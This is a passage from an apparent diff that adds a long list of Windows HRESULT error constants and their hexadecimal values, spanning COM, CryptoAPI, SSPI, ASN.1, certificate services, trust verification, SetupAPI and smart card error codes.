+CO_E_INITIALIZATIONFAILED = 0x8004E025
+CONTEXT_E_NOJIT = 0x8004E026
+CONTEXT_E_NOTRANSACTION = 0x8004E027
+CO_E_THREADINGMODEL_CHANGED = 0x8004E028
+CO_E_NOIISINTRINSICS = 0x8004E029
+CO_E_NOCOOKIES = 0x8004E02A
+CO_E_DBERROR = 0x8004E02B
+CO_E_NOTPOOLED = 0x8004E02C
+CO_E_NOTCONSTRUCTED = 0x8004E02D
+CO_E_NOSYNCHRONIZATION = 0x8004E02E
+CO_E_ISOLEVELMISMATCH = 0x8004E02F
+CO_E_CALL_OUT_OF_TX_SCOPE_NOT_ALLOWED = 0x8004E030
+CO_E_EXIT_TRANSACTION_SCOPE_NOT_CALLED = 0x8004E031
+E_ACCESSDENIED = 0x80070005
+E_OUTOFMEMORY = 0x8007000E
+ERROR_NOT_SUPPORTED = 0x80070032
+E_INVALIDARG = 0x80070057
+CO_E_CLASS_CREATE_FAILED = 0x80080001
+CO_E_SCM_ERROR = 0x80080002
+CO_E_SCM_RPC_FAILURE = 0x80080003
+CO_E_BAD_PATH = 0x80080004
+CO_E_SERVER_EXEC_FAILURE = 0x80080005
+CO_E_OBJSRV_RPC_FAILURE = 0x80080006
+MK_E_NO_NORMALIZED = 0x80080007
+CO_E_SERVER_STOPPING = 0x80080008
+MEM_E_INVALID_ROOT = 0x80080009
+MEM_E_INVALID_LINK = 0x80080010
+MEM_E_INVALID_SIZE = 0x80080011
+CO_E_MISSING_DISPLAYNAME = 0x80080015
+CO_E_RUNAS_VALUE_MUST_BE_AAA = 0x80080016
+CO_E_ELEVATION_DISABLED = 0x80080017
+NTE_BAD_UID = 0x80090001
+NTE_BAD_HASH = 0x80090002
+NTE_BAD_KEY = 0x80090003
+NTE_BAD_LEN = 0x80090004
+NTE_BAD_DATA = 0x80090005
+NTE_BAD_SIGNATURE = 0x80090006
+NTE_BAD_VER = 0x80090007
+NTE_BAD_ALGID = 0x80090008
+NTE_BAD_FLAGS = 0x80090009
+NTE_BAD_TYPE = 0x8009000A
+NTE_BAD_KEY_STATE = 0x8009000B
+NTE_BAD_HASH_STATE = 0x8009000C
+NTE_NO_KEY = 0x8009000D
+NTE_NO_MEMORY = 0x8009000E
+NTE_EXISTS = 0x8009000F
+NTE_PERM = 0x80090010
+NTE_NOT_FOUND = 0x80090011
+NTE_DOUBLE_ENCRYPT = 0x80090012
+NTE_BAD_PROVIDER = 0x80090013
+NTE_BAD_PROV_TYPE = 0x80090014
+NTE_BAD_PUBLIC_KEY = 0x80090015
+NTE_BAD_KEYSET = 0x80090016
+NTE_PROV_TYPE_NOT_DEF = 0x80090017
+NTE_PROV_TYPE_ENTRY_BAD = 0x80090018
+NTE_KEYSET_NOT_DEF = 0x80090019
+NTE_KEYSET_ENTRY_BAD = 0x8009001A
+NTE_PROV_TYPE_NO_MATCH = 0x8009001B
+NTE_SIGNATURE_FILE_BAD = 0x8009001C
+NTE_PROVIDER_DLL_FAIL = 0x8009001D
+NTE_PROV_DLL_NOT_FOUND = 0x8009001E
+NTE_BAD_KEYSET_PARAM = 0x8009001F
+NTE_FAIL = 0x80090020
+NTE_SYS_ERR = 0x80090021
+NTE_SILENT_CONTEXT = 0x80090022
+NTE_TOKEN_KEYSET_STORAGE_FULL = 0x80090023
+NTE_TEMPORARY_PROFILE = 0x80090024
+NTE_FIXEDPARAMETER = 0x80090025
+NTE_INVALID_HANDLE = 0x80090026
+NTE_INVALID_PARAMETER = 0x80090027
+NTE_BUFFER_TOO_SMALL = 0x80090028
+NTE_NOT_SUPPORTED = 0x80090029
+NTE_NO_MORE_ITEMS = 0x8009002A
+NTE_BUFFERS_OVERLAP = 0x8009002B
+NTE_DECRYPTION_FAILURE = 0x8009002C
+NTE_INTERNAL_ERROR = 0x8009002D
+NTE_UI_REQUIRED = 0x8009002E
+NTE_HMAC_NOT_SUPPORTED = 0x8009002F
+SEC_E_INSUFFICIENT_MEMORY = 0x80090300
+SEC_E_INVALID_HANDLE = 0x80090301
+SEC_E_UNSUPPORTED_FUNCTION = 0x80090302
+SEC_E_TARGET_UNKNOWN = 0x80090303
+SEC_E_INTERNAL_ERROR = 0x80090304
+SEC_E_SECPKG_NOT_FOUND = 0x80090305
+SEC_E_NOT_OWNER = 0x80090306
+SEC_E_CANNOT_INSTALL = 0x80090307
+SEC_E_INVALID_TOKEN = 0x80090308
+SEC_E_CANNOT_PACK = 0x80090309
+SEC_E_QOP_NOT_SUPPORTED = 0x8009030A
+SEC_E_NO_IMPERSONATION = 0x8009030B
+SEC_E_LOGON_DENIED = 0x8009030C
+SEC_E_UNKNOWN_CREDENTIALS = 0x8009030D
+SEC_E_NO_CREDENTIALS = 0x8009030E
+SEC_E_MESSAGE_ALTERED = 0x8009030F
+SEC_E_OUT_OF_SEQUENCE = 0x80090310
+SEC_E_NO_AUTHENTICATING_AUTHORITY = 0x80090311
+SEC_E_BAD_PKGID = 0x80090316
+SEC_E_CONTEXT_EXPIRED = 0x80090317
+SEC_E_INCOMPLETE_MESSAGE = 0x80090318
+SEC_E_INCOMPLETE_CREDENTIALS = 0x80090320
+SEC_E_BUFFER_TOO_SMALL = 0x80090321
+SEC_E_WRONG_PRINCIPAL = 0x80090322
+SEC_E_TIME_SKEW = 0x80090324
+SEC_E_UNTRUSTED_ROOT = 0x80090325
+SEC_E_ILLEGAL_MESSAGE = 0x80090326
+SEC_E_CERT_UNKNOWN = 0x80090327
+SEC_E_CERT_EXPIRED = 0x80090328
+SEC_E_ENCRYPT_FAILURE = 0x80090329
+SEC_E_DECRYPT_FAILURE = 0x80090330
+SEC_E_ALGORITHM_MISMATCH = 0x80090331
+SEC_E_SECURITY_QOS_FAILED = 0x80090332
+SEC_E_UNFINISHED_CONTEXT_DELETED = 0x80090333
+SEC_E_NO_TGT_REPLY = 0x80090334
+SEC_E_NO_IP_ADDRESSES = 0x80090335
+SEC_E_WRONG_CREDENTIAL_HANDLE = 0x80090336
+SEC_E_CRYPTO_SYSTEM_INVALID = 0x80090337
+SEC_E_MAX_REFERRALS_EXCEEDED = 0x80090338
+SEC_E_MUST_BE_KDC = 0x80090339
+SEC_E_STRONG_CRYPTO_NOT_SUPPORTED = 0x8009033A
+SEC_E_TOO_MANY_PRINCIPALS = 0x8009033B
+SEC_E_NO_PA_DATA = 0x8009033C
+SEC_E_PKINIT_NAME_MISMATCH = 0x8009033D
+SEC_E_SMARTCARD_LOGON_REQUIRED = 0x8009033E
+SEC_E_SHUTDOWN_IN_PROGRESS = 0x8009033F
+SEC_E_KDC_INVALID_REQUEST = 0x80090340
+SEC_E_KDC_UNABLE_TO_REFER = 0x80090341
+SEC_E_KDC_UNKNOWN_ETYPE = 0x80090342
+SEC_E_UNSUPPORTED_PREAUTH = 0x80090343
+SEC_E_DELEGATION_REQUIRED = 0x80090345
+SEC_E_BAD_BINDINGS = 0x80090346
+SEC_E_MULTIPLE_ACCOUNTS = 0x80090347
+SEC_E_NO_KERB_KEY = 0x80090348
+SEC_E_CERT_WRONG_USAGE = 0x80090349
+SEC_E_DOWNGRADE_DETECTED = 0x80090350
+SEC_E_SMARTCARD_CERT_REVOKED = 0x80090351
+SEC_E_ISSUING_CA_UNTRUSTED = 0x80090352
+SEC_E_REVOCATION_OFFLINE_C = 0x80090353
+SEC_E_PKINIT_CLIENT_FAILURE = 0x80090354
+SEC_E_SMARTCARD_CERT_EXPIRED = 0x80090355
+SEC_E_NO_S4U_PROT_SUPPORT = 0x80090356
+SEC_E_CROSSREALM_DELEGATION_FAILURE = 0x80090357
+SEC_E_REVOCATION_OFFLINE_KDC = 0x80090358
+SEC_E_ISSUING_CA_UNTRUSTED_KDC = 0x80090359
+SEC_E_KDC_CERT_EXPIRED = 0x8009035A
+SEC_E_KDC_CERT_REVOKED = 0x8009035B
+SEC_E_INVALID_PARAMETER = 0x8009035D
+SEC_E_DELEGATION_POLICY = 0x8009035E
+SEC_E_POLICY_NLTM_ONLY = 0x8009035F
+CRYPT_E_MSG_ERROR = 0x80091001
+CRYPT_E_UNKNOWN_ALGO = 0x80091002
+CRYPT_E_OID_FORMAT = 0x80091003
+CRYPT_E_INVALID_MSG_TYPE = 0x80091004
+CRYPT_E_UNEXPECTED_ENCODING = 0x80091005
+CRYPT_E_AUTH_ATTR_MISSING = 0x80091006
+CRYPT_E_HASH_VALUE = 0x80091007
+CRYPT_E_INVALID_INDEX = 0x80091008
+CRYPT_E_ALREADY_DECRYPTED = 0x80091009
+CRYPT_E_NOT_DECRYPTED = 0x8009100A
+CRYPT_E_RECIPIENT_NOT_FOUND = 0x8009100B
+CRYPT_E_CONTROL_TYPE = 0x8009100C
+CRYPT_E_ISSUER_SERIALNUMBER = 0x8009100D
+CRYPT_E_SIGNER_NOT_FOUND = 0x8009100E
+CRYPT_E_ATTRIBUTES_MISSING = 0x8009100F
+CRYPT_E_STREAM_MSG_NOT_READY = 0x80091010
+CRYPT_E_STREAM_INSUFFICIENT_DATA = 0x80091011
+CRYPT_E_BAD_LEN = 0x80092001
+CRYPT_E_BAD_ENCODE = 0x80092002
+CRYPT_E_FILE_ERROR = 0x80092003
+CRYPT_E_NOT_FOUND = 0x80092004
+CRYPT_E_EXISTS = 0x80092005
+CRYPT_E_NO_PROVIDER = 0x80092006
+CRYPT_E_SELF_SIGNED = 0x80092007
+CRYPT_E_DELETED_PREV = 0x80092008
+CRYPT_E_NO_MATCH = 0x80092009
+CRYPT_E_UNEXPECTED_MSG_TYPE = 0x8009200A
+CRYPT_E_NO_KEY_PROPERTY = 0x8009200B
+CRYPT_E_NO_DECRYPT_CERT = 0x8009200C
+CRYPT_E_BAD_MSG = 0x8009200D
+CRYPT_E_NO_SIGNER = 0x8009200E
+CRYPT_E_PENDING_CLOSE = 0x8009200F
+CRYPT_E_REVOKED = 0x80092010
+CRYPT_E_NO_REVOCATION_DLL = 0x80092011
+CRYPT_E_NO_REVOCATION_CHECK = 0x80092012
+CRYPT_E_REVOCATION_OFFLINE = 0x80092013
+CRYPT_E_NOT_IN_REVOCATION_DATABASE = 0x80092014
+CRYPT_E_INVALID_NUMERIC_STRING = 0x80092020
+CRYPT_E_INVALID_PRINTABLE_STRING = 0x80092021
+CRYPT_E_INVALID_IA5_STRING = 0x80092022
+CRYPT_E_INVALID_X500_STRING = 0x80092023
+CRYPT_E_NOT_CHAR_STRING = 0x80092024
+CRYPT_E_FILERESIZED = 0x80092025
+CRYPT_E_SECURITY_SETTINGS = 0x80092026
+CRYPT_E_NO_VERIFY_USAGE_DLL = 0x80092027
+CRYPT_E_NO_VERIFY_USAGE_CHECK = 0x80092028
+CRYPT_E_VERIFY_USAGE_OFFLINE = 0x80092029
+CRYPT_E_NOT_IN_CTL = 0x8009202A
+CRYPT_E_NO_TRUSTED_SIGNER = 0x8009202B
+CRYPT_E_MISSING_PUBKEY_PARA = 0x8009202C
+CRYPT_E_OSS_ERROR = 0x80093000
+OSS_MORE_BUF = 0x80093001
+OSS_NEGATIVE_UINTEGER = 0x80093002
+OSS_PDU_RANGE = 0x80093003
+OSS_MORE_INPUT = 0x80093004
+OSS_DATA_ERROR = 0x80093005
+OSS_BAD_ARG = 0x80093006
+OSS_BAD_VERSION = 0x80093007
+OSS_OUT_MEMORY = 0x80093008
+OSS_PDU_MISMATCH = 0x80093009
+OSS_LIMITED = 0x8009300A
+OSS_BAD_PTR = 0x8009300B
+OSS_BAD_TIME = 0x8009300C
+OSS_INDEFINITE_NOT_SUPPORTED = 0x8009300D
+OSS_MEM_ERROR = 0x8009300E
+OSS_BAD_TABLE = 0x8009300F
+OSS_TOO_LONG = 0x80093010
+OSS_CONSTRAINT_VIOLATED = 0x80093011
+OSS_FATAL_ERROR = 0x80093012
+OSS_ACCESS_SERIALIZATION_ERROR = 0x80093013
+OSS_NULL_TBL = 0x80093014
+OSS_NULL_FCN = 0x80093015
+OSS_BAD_ENCRULES = 0x80093016
+OSS_UNAVAIL_ENCRULES = 0x80093017
+OSS_CANT_OPEN_TRACE_WINDOW = 0x80093018
+OSS_UNIMPLEMENTED = 0x80093019
+OSS_OID_DLL_NOT_LINKED = 0x8009301A
+OSS_CANT_OPEN_TRACE_FILE = 0x8009301B
+OSS_TRACE_FILE_ALREADY_OPEN = 0x8009301C
+OSS_TABLE_MISMATCH = 0x8009301D
+OSS_TYPE_NOT_SUPPORTED = 0x8009301E
+OSS_REAL_DLL_NOT_LINKED = 0x8009301F
+OSS_REAL_CODE_NOT_LINKED = 0x80093020
+OSS_OUT_OF_RANGE = 0x80093021
+OSS_COPIER_DLL_NOT_LINKED = 0x80093022
+OSS_CONSTRAINT_DLL_NOT_LINKED = 0x80093023
+OSS_COMPARATOR_DLL_NOT_LINKED = 0x80093024
+OSS_COMPARATOR_CODE_NOT_LINKED = 0x80093025
+OSS_MEM_MGR_DLL_NOT_LINKED = 0x80093026
+OSS_PDV_DLL_NOT_LINKED = 0x80093027
+OSS_PDV_CODE_NOT_LINKED = 0x80093028
+OSS_API_DLL_NOT_LINKED = 0x80093029
+OSS_BERDER_DLL_NOT_LINKED = 0x8009302A
+OSS_PER_DLL_NOT_LINKED = 0x8009302B
+OSS_OPEN_TYPE_ERROR = 0x8009302C
+OSS_MUTEX_NOT_CREATED = 0x8009302D
+OSS_CANT_CLOSE_TRACE_FILE = 0x8009302E
+CRYPT_E_ASN1_ERROR = 0x80093100
+CRYPT_E_ASN1_INTERNAL = 0x80093101
+CRYPT_E_ASN1_EOD = 0x80093102
+CRYPT_E_ASN1_CORRUPT = 0x80093103
+CRYPT_E_ASN1_LARGE = 0x80093104
+CRYPT_E_ASN1_CONSTRAINT = 0x80093105
+CRYPT_E_ASN1_MEMORY = 0x80093106
+CRYPT_E_ASN1_OVERFLOW = 0x80093107
+CRYPT_E_ASN1_BADPDU = 0x80093108
+CRYPT_E_ASN1_BADARGS = 0x80093109
+CRYPT_E_ASN1_BADREAL = 0x8009310A
+CRYPT_E_ASN1_BADTAG = 0x8009310B
+CRYPT_E_ASN1_CHOICE = 0x8009310C
+CRYPT_E_ASN1_RULE = 0x8009310D
+CRYPT_E_ASN1_UTF8 = 0x8009310E
+CRYPT_E_ASN1_PDU_TYPE = 0x80093133
+CRYPT_E_ASN1_NYI = 0x80093134
+CRYPT_E_ASN1_EXTENDED = 0x80093201
+CRYPT_E_ASN1_NOEOD = 0x80093202
+CERTSRV_E_BAD_REQUESTSUBJECT = 0x80094001
+CERTSRV_E_NO_REQUEST = 0x80094002
+CERTSRV_E_BAD_REQUESTSTATUS = 0x80094003
+CERTSRV_E_PROPERTY_EMPTY = 0x80094004
+CERTSRV_E_INVALID_CA_CERTIFICATE = 0x80094005
+CERTSRV_E_SERVER_SUSPENDED = 0x80094006
+CERTSRV_E_ENCODING_LENGTH = 0x80094007
+CERTSRV_E_ROLECONFLICT = 0x80094008
+CERTSRV_E_RESTRICTEDOFFICER = 0x80094009
+CERTSRV_E_KEY_ARCHIVAL_NOT_CONFIGURED = 0x8009400A
+CERTSRV_E_NO_VALID_KRA = 0x8009400B
+CERTSRV_E_BAD_REQUEST_KEY_ARCHIVAL = 0x8009400C
+CERTSRV_E_NO_CAADMIN_DEFINED = 0x8009400D
+CERTSRV_E_BAD_RENEWAL_CERT_ATTRIBUTE = 0x8009400E
+CERTSRV_E_NO_DB_SESSIONS = 0x8009400F
+CERTSRV_E_ALIGNMENT_FAULT = 0x80094010
+CERTSRV_E_ENROLL_DENIED = 0x80094011
+CERTSRV_E_TEMPLATE_DENIED = 0x80094012
+CERTSRV_E_DOWNLEVEL_DC_SSL_OR_UPGRADE = 0x80094013
+CERTSRV_E_UNSUPPORTED_CERT_TYPE = 0x80094800
+CERTSRV_E_NO_CERT_TYPE = 0x80094801
+CERTSRV_E_TEMPLATE_CONFLICT = 0x80094802
+CERTSRV_E_SUBJECT_ALT_NAME_REQUIRED = 0x80094803
+CERTSRV_E_ARCHIVED_KEY_REQUIRED = 0x80094804
+CERTSRV_E_SMIME_REQUIRED = 0x80094805
+CERTSRV_E_BAD_RENEWAL_SUBJECT = 0x80094806
+CERTSRV_E_BAD_TEMPLATE_VERSION = 0x80094807
+CERTSRV_E_TEMPLATE_POLICY_REQUIRED = 0x80094808
+CERTSRV_E_SIGNATURE_POLICY_REQUIRED = 0x80094809
+CERTSRV_E_SIGNATURE_COUNT = 0x8009480A
+CERTSRV_E_SIGNATURE_REJECTED = 0x8009480B
+CERTSRV_E_ISSUANCE_POLICY_REQUIRED = 0x8009480C
+CERTSRV_E_SUBJECT_UPN_REQUIRED = 0x8009480D
+CERTSRV_E_SUBJECT_DIRECTORY_GUID_REQUIRED = 0x8009480E
+CERTSRV_E_SUBJECT_DNS_REQUIRED = 0x8009480F
+CERTSRV_E_ARCHIVED_KEY_UNEXPECTED = 0x80094810
+CERTSRV_E_KEY_LENGTH = 0x80094811
+CERTSRV_E_SUBJECT_EMAIL_REQUIRED = 0x80094812
+CERTSRV_E_UNKNOWN_CERT_TYPE = 0x80094813
+CERTSRV_E_CERT_TYPE_OVERLAP = 0x80094814
+CERTSRV_E_TOO_MANY_SIGNATURES = 0x80094815
+CERTSRV_E_RENEWAL_BAD_PUBLIC_KEY = 0x80094816
+CERTSRV_E_INVALID_EK = 0x80094817
+CERTSRV_E_KEY_ATTESTATION = 0x8009481A
+XENROLL_E_KEY_NOT_EXPORTABLE = 0x80095000
+XENROLL_E_CANNOT_ADD_ROOT_CERT = 0x80095001
+XENROLL_E_RESPONSE_KA_HASH_NOT_FOUND = 0x80095002
+XENROLL_E_RESPONSE_UNEXPECTED_KA_HASH = 0x80095003
+XENROLL_E_RESPONSE_KA_HASH_MISMATCH = 0x80095004
+XENROLL_E_KEYSPEC_SMIME_MISMATCH = 0x80095005
+TRUST_E_SYSTEM_ERROR = 0x80096001
+TRUST_E_NO_SIGNER_CERT = 0x80096002
+TRUST_E_COUNTER_SIGNER = 0x80096003
+TRUST_E_CERT_SIGNATURE = 0x80096004
+TRUST_E_TIME_STAMP = 0x80096005
+TRUST_E_BAD_DIGEST = 0x80096010
+TRUST_E_BASIC_CONSTRAINTS = 0x80096019
+TRUST_E_FINANCIAL_CRITERIA = 0x8009601E
+MSSIPOTF_E_OUTOFMEMRANGE = 0x80097001
+MSSIPOTF_E_CANTGETOBJECT = 0x80097002
+MSSIPOTF_E_NOHEADTABLE = 0x80097003
+MSSIPOTF_E_BAD_MAGICNUMBER = 0x80097004
+MSSIPOTF_E_BAD_OFFSET_TABLE = 0x80097005
+MSSIPOTF_E_TABLE_TAGORDER = 0x80097006
+MSSIPOTF_E_TABLE_LONGWORD = 0x80097007
+MSSIPOTF_E_BAD_FIRST_TABLE_PLACEMENT = 0x80097008
+MSSIPOTF_E_TABLES_OVERLAP = 0x80097009
+MSSIPOTF_E_TABLE_PADBYTES = 0x8009700A
+MSSIPOTF_E_FILETOOSMALL = 0x8009700B
+MSSIPOTF_E_TABLE_CHECKSUM = 0x8009700C
+MSSIPOTF_E_FILE_CHECKSUM = 0x8009700D
+MSSIPOTF_E_FAILED_POLICY = 0x80097010
+MSSIPOTF_E_FAILED_HINTS_CHECK = 0x80097011
+MSSIPOTF_E_NOT_OPENTYPE = 0x80097012
+MSSIPOTF_E_FILE = 0x80097013
+MSSIPOTF_E_CRYPT = 0x80097014
+MSSIPOTF_E_BADVERSION = 0x80097015
+MSSIPOTF_E_DSIG_STRUCTURE = 0x80097016
+MSSIPOTF_E_PCONST_CHECK = 0x80097017
+MSSIPOTF_E_STRUCTURE = 0x80097018
+ERROR_CRED_REQUIRES_CONFIRMATION = 0x80097019
+TRUST_E_PROVIDER_UNKNOWN = 0x800B0001
+TRUST_E_ACTION_UNKNOWN = 0x800B0002
+TRUST_E_SUBJECT_FORM_UNKNOWN = 0x800B0003
+TRUST_E_SUBJECT_NOT_TRUSTED = 0x800B0004
+DIGSIG_E_ENCODE = 0x800B0005
+DIGSIG_E_DECODE = 0x800B0006
+DIGSIG_E_EXTENSIBILITY = 0x800B0007
+DIGSIG_E_CRYPTO = 0x800B0008
+PERSIST_E_SIZEDEFINITE = 0x800B0009
+PERSIST_E_SIZEINDEFINITE = 0x800B000A
+PERSIST_E_NOTSELFSIZING = 0x800B000B
+TRUST_E_NOSIGNATURE = 0x800B0100
+CERT_E_EXPIRED = 0x800B0101
+CERT_E_VALIDITYPERIODNESTING = 0x800B0102
+CERT_E_ROLE = 0x800B0103
+CERT_E_PATHLENCONST = 0x800B0104
+CERT_E_CRITICAL = 0x800B0105
+CERT_E_PURPOSE = 0x800B0106
+CERT_E_ISSUERCHAINING = 0x800B0107
+CERT_E_MALFORMED = 0x800B0108
+CERT_E_UNTRUSTEDROOT = 0x800B0109
+CERT_E_CHAINING = 0x800B010A
+TRUST_E_FAIL = 0x800B010B
+CERT_E_REVOKED = 0x800B010C
+CERT_E_UNTRUSTEDTESTROOT = 0x800B010D
+CERT_E_REVOCATION_FAILURE = 0x800B010E
+CERT_E_CN_NO_MATCH = 0x800B010F
+CERT_E_WRONG_USAGE = 0x800B0110
+TRUST_E_EXPLICIT_DISTRUST = 0x800B0111
+CERT_E_UNTRUSTEDCA = 0x800B0112
+CERT_E_INVALID_POLICY = 0x800B0113
+CERT_E_INVALID_NAME = 0x800B0114
+NS_W_SERVER_BANDWIDTH_LIMIT = 0x800D0003
+NS_W_FILE_BANDWIDTH_LIMIT = 0x800D0004
+NS_W_UNKNOWN_EVENT = 0x800D0060
+NS_I_CATATONIC_FAILURE = 0x800D0199
+NS_I_CATATONIC_AUTO_UNFAIL = 0x800D019A
+SPAPI_E_EXPECTED_SECTION_NAME = 0x800F0000
+SPAPI_E_BAD_SECTION_NAME_LINE = 0x800F0001
+SPAPI_E_SECTION_NAME_TOO_LONG = 0x800F0002
+SPAPI_E_GENERAL_SYNTAX = 0x800F0003
+SPAPI_E_WRONG_INF_STYLE = 0x800F0100
+SPAPI_E_SECTION_NOT_FOUND = 0x800F0101
+SPAPI_E_LINE_NOT_FOUND = 0x800F0102
+SPAPI_E_NO_BACKUP = 0x800F0103
+SPAPI_E_NO_ASSOCIATED_CLASS = 0x800F0200
+SPAPI_E_CLASS_MISMATCH = 0x800F0201
+SPAPI_E_DUPLICATE_FOUND = 0x800F0202
+SPAPI_E_NO_DRIVER_SELECTED = 0x800F0203
+SPAPI_E_KEY_DOES_NOT_EXIST = 0x800F0204
+SPAPI_E_INVALID_DEVINST_NAME = 0x800F0205
+SPAPI_E_INVALID_CLASS = 0x800F0206
+SPAPI_E_DEVINST_ALREADY_EXISTS = 0x800F0207
+SPAPI_E_DEVINFO_NOT_REGISTERED = 0x800F0208
+SPAPI_E_INVALID_REG_PROPERTY = 0x800F0209
+SPAPI_E_NO_INF = 0x800F020A
+SPAPI_E_NO_SUCH_DEVINST = 0x800F020B
+SPAPI_E_CANT_LOAD_CLASS_ICON = 0x800F020C
+SPAPI_E_INVALID_CLASS_INSTALLER = 0x800F020D
+SPAPI_E_DI_DO_DEFAULT = 0x800F020E
+SPAPI_E_DI_NOFILECOPY = 0x800F020F
+SPAPI_E_INVALID_HWPROFILE = 0x800F0210
+SPAPI_E_NO_DEVICE_SELECTED = 0x800F0211
+SPAPI_E_DEVINFO_LIST_LOCKED = 0x800F0212
+SPAPI_E_DEVINFO_DATA_LOCKED = 0x800F0213
+SPAPI_E_DI_BAD_PATH = 0x800F0214
+SPAPI_E_NO_CLASSINSTALL_PARAMS = 0x800F0215
+SPAPI_E_FILEQUEUE_LOCKED = 0x800F0216
+SPAPI_E_BAD_SERVICE_INSTALLSECT = 0x800F0217
+SPAPI_E_NO_CLASS_DRIVER_LIST = 0x800F0218
+SPAPI_E_NO_ASSOCIATED_SERVICE = 0x800F0219
+SPAPI_E_NO_DEFAULT_DEVICE_INTERFACE = 0x800F021A
+SPAPI_E_DEVICE_INTERFACE_ACTIVE = 0x800F021B
+SPAPI_E_DEVICE_INTERFACE_REMOVED = 0x800F021C
+SPAPI_E_BAD_INTERFACE_INSTALLSECT = 0x800F021D
+SPAPI_E_NO_SUCH_INTERFACE_CLASS = 0x800F021E
+SPAPI_E_INVALID_REFERENCE_STRING = 0x800F021F
+SPAPI_E_INVALID_MACHINENAME = 0x800F0220
+SPAPI_E_REMOTE_COMM_FAILURE = 0x800F0221
+SPAPI_E_MACHINE_UNAVAILABLE = 0x800F0222
+SPAPI_E_NO_CONFIGMGR_SERVICES = 0x800F0223
+SPAPI_E_INVALID_PROPPAGE_PROVIDER = 0x800F0224
+SPAPI_E_NO_SUCH_DEVICE_INTERFACE = 0x800F0225
+SPAPI_E_DI_POSTPROCESSING_REQUIRED = 0x800F0226
+SPAPI_E_INVALID_COINSTALLER = 0x800F0227
+SPAPI_E_NO_COMPAT_DRIVERS = 0x800F0228
+SPAPI_E_NO_DEVICE_ICON = 0x800F0229
+SPAPI_E_INVALID_INF_LOGCONFIG = 0x800F022A
+SPAPI_E_DI_DONT_INSTALL = 0x800F022B
+SPAPI_E_INVALID_FILTER_DRIVER = 0x800F022C
+SPAPI_E_NON_WINDOWS_NT_DRIVER = 0x800F022D
+SPAPI_E_NON_WINDOWS_DRIVER = 0x800F022E
+SPAPI_E_NO_CATALOG_FOR_OEM_INF = 0x800F022F
+SPAPI_E_DEVINSTALL_QUEUE_NONNATIVE = 0x800F0230
+SPAPI_E_NOT_DISABLEABLE = 0x800F0231
+SPAPI_E_CANT_REMOVE_DEVINST = 0x800F0232
+SPAPI_E_INVALID_TARGET = 0x800F0233
+SPAPI_E_DRIVER_NONNATIVE = 0x800F0234
+SPAPI_E_IN_WOW64 = 0x800F0235
+SPAPI_E_SET_SYSTEM_RESTORE_POINT = 0x800F0236
+SPAPI_E_INCORRECTLY_COPIED_INF = 0x800F0237
+SPAPI_E_SCE_DISABLED = 0x800F0238
+SPAPI_E_UNKNOWN_EXCEPTION = 0x800F0239
+SPAPI_E_PNP_REGISTRY_ERROR = 0x800F023A
+SPAPI_E_REMOTE_REQUEST_UNSUPPORTED = 0x800F023B
+SPAPI_E_NOT_AN_INSTALLED_OEM_INF = 0x800F023C
+SPAPI_E_INF_IN_USE_BY_DEVICES = 0x800F023D
+SPAPI_E_DI_FUNCTION_OBSOLETE = 0x800F023E
+SPAPI_E_NO_AUTHENTICODE_CATALOG = 0x800F023F
+SPAPI_E_AUTHENTICODE_DISALLOWED = 0x800F0240
+SPAPI_E_AUTHENTICODE_TRUSTED_PUBLISHER = 0x800F0241
+SPAPI_E_AUTHENTICODE_TRUST_NOT_ESTABLISHED = 0x800F0242
+SPAPI_E_AUTHENTICODE_PUBLISHER_NOT_TRUSTED = 0x800F0243
+SPAPI_E_SIGNATURE_OSATTRIBUTE_MISMATCH = 0x800F0244
+SPAPI_E_ONLY_VALIDATE_VIA_AUTHENTICODE = 0x800F0245
+SPAPI_E_DEVICE_INSTALLER_NOT_READY = 0x800F0246
+SPAPI_E_DRIVER_STORE_ADD_FAILED = 0x800F0247
+SPAPI_E_DEVICE_INSTALL_BLOCKED = 0x800F0248
+SPAPI_E_DRIVER_INSTALL_BLOCKED = 0x800F0249
+SPAPI_E_WRONG_INF_TYPE = 0x800F024A
+SPAPI_E_FILE_HASH_NOT_IN_CATALOG = 0x800F024B
+SPAPI_E_DRIVER_STORE_DELETE_FAILED = 0x800F024C
+SPAPI_E_UNRECOVERABLE_STACK_OVERFLOW = 0x800F0300
+SPAPI_E_ERROR_NOT_INSTALLED = 0x800F1000
+SCARD_F_INTERNAL_ERROR = 0x80100001
+SCARD_E_CANCELLED = 0x80100002
+SCARD_E_INVALID_HANDLE = 0x80100003
+SCARD_E_INVALID_PARAMETER = 0x80100004
+SCARD_E_INVALID_TARGET = 0x80100005
+SCARD_E_NO_MEMORY = 0x80100006
+SCARD_F_WAITED_TOO_LONG = 0x80100007
+SCARD_E_INSUFFICIENT_BUFFER = 0x80100008
+SCARD_E_UNKNOWN_READER = 0x80100009
+SCARD_E_TIMEOUT = 0x8010000A
+SCARD_E_SHARING_VIOLATION = 0x8010000B
+SCARD_E_NO_SMARTCARD = 0x8010000C
+SCARD_E_UNKNOWN_CARD = 0x8010000D
+SCARD_E_CANT_DISPOSE = 0x8010000E
+SCARD_E_PROTO_MISMATCH = 0x8010000F
+SCARD_E_NOT_READY = 0x80100010
+SCARD_E_INVALID_VALUE = 0x80100011
+SCARD_E_SYSTEM_CANCELLED = 0x80100012
+SCARD_F_COMM_ERROR = 0x80100013
+SCARD_F_UNKNOWN_ERROR = 0x80100014
+SCARD_E_INVALID_ATR = 0x80100015
+SCARD_E_NOT_TRANSACTED = 0x80100016
+SCARD_E_READER_UNAVAILABLE = 0x80100017
+SCARD_P_SHUTDOWN = 0x80100018
+SCARD_E_PCI_TOO_SMALL = 0x80100019
+SCARD_E_READER_UNSUPPORTED = 0x8010001A
+SCARD_E_DUPLICATE_READER = 0x8010001B
+SCARD_E_CARD_UNSUPPORTED = 0x8010001C
+SCARD_E_NO_SERVICE = 0x8010001D
+SCARD_E_SERVICE_STOPPED = 0x8010001E
+SCARD_E_UNEXPECTED = 0x8010001F
+SCARD_E_ICC_INSTALLATION = 0x80100020
+SCARD_E_ICC_CREATEORDER = 0x80100021
+SCARD_E_UNSUPPORTED_FEATURE = 0x80100022
+SCARD_E_DIR_NOT_FOUND = 0x80100023
+SCARD_E_FILE_NOT_FOUND = 0x80100024
+SCARD_E_NO_DIR = 0x80100025
+SCARD_E_NO_FILE = 0x80100026
+SCARD_E_NO_ACCESS = 0x80100027
+SCARD_E_WRITE_TOO_MANY = 0x80100028
+SCARD_E_BAD_SEEK = 0x80100029
+SCARD_E_INVALID_CHV = 0x8010002A
+SCARD_E_UNKNOWN_RES_MNG = 0x8010002B
+SCARD_E_NO_SUCH_CERTIFICATE = 0x8010002C
